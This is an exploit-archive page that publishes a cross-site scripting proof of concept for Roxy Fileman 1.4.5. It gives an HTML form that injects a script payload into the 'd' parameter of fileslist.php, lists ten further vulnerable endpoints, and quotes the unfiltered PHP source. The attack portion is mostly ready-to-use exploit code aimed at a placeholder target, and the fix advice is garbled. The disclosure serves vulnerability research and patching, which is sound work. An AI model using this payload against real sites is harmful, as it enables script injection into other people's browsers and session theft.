exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Roxy Fileman 1.4.5 Cross Site Scripting

Roxy Fileman 1.4.5 Cross Site Scripting
Posted Jan 13, 2017
Authored by Nc Kh

Roxy Fileman version 1.4.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 4121ac2901b76a000dc187988c251ad5a0b33ca7110116e14d0094e4806781f2

Roxy Fileman 1.4.5 Cross Site Scripting

Change Mirror Download

*=============================================================|
| Exploit Title:A Roxy Fileman Cross Site Scripting
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.roxyfileman.com/
|
| Download Link : http://www.roxyfileman.com/download.php?f=1.4.5-php
|
| Version : V 1.4.5
|
| Platform : PHP
|
| Tested on:A Kali Linux
|
| Date: 1 /12 / 2017
*=============================================================|
| Exploit Code:
|
|<HTML>
|<HEAD>
|A A A <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
|</HEAD>
|<BODY>
|<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
| <input type="hidden" id="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25"><script>alert('M.R.S.L.Y')</script>/>
|</form>
|</BODY>
|</HTML>
|
*=======================|
| vulnerability Method : GET & POST
| Files that have this vulnerability :
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
|How to fix this vulnerability :
|
|You should first try to f.ilter all input variables O After use command echo in script :)
|
*=======================|
|Vulnerable code For Example:
|
|include '../system.inc.php';
|include 'functions.inc.php';
|
|verifyAction('FILESLIST');
|checkAccess('FILESLIST');
|
|$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
|$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
|if($type != 'image' && $type != 'flash')
|A $type = '';
|verifyPath($path);
|
|$files = listDirectory(fixPath($path), 0);
|natcasesort($files);
|$str = '';
|echo '[';
|foreach ($files as $f){
|A $fullPath = $path.'/'.$f;
|A if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
|A A A continue;
|A $size = filesize(fixPath($fullPath));
|A $time = filemtime(fixPath($fullPath));
|A $w = 0;
|A $h = 0;
|A if(RoxyFile::IsImage($f)){
|A A A $tmp = @getimagesize(fixPath($fullPath));
|A A A if($tmp){
|A A A A A $w = $tmp[0];
|A A A A A $h = $tmp[1];
|A A A }
|A }
|A $str .= '{"p":"'.mb_ereg_replace('"', '\\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
|}
|$str = mb_substr($str, 0, -1);
|echo $str;
|echo ']';
|?>A
*=============================================================|
| Special Thanks To : Ehsan Cod3r O micle O Und3rgr0und O Amir.ght O
| xenotixO modiretO V For Vendetta O Alireza O r4ouf O Spoofer O
| And All Of My Friends O The Last One : My Self, M.R.S.L.YA
*=============================================================|A
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close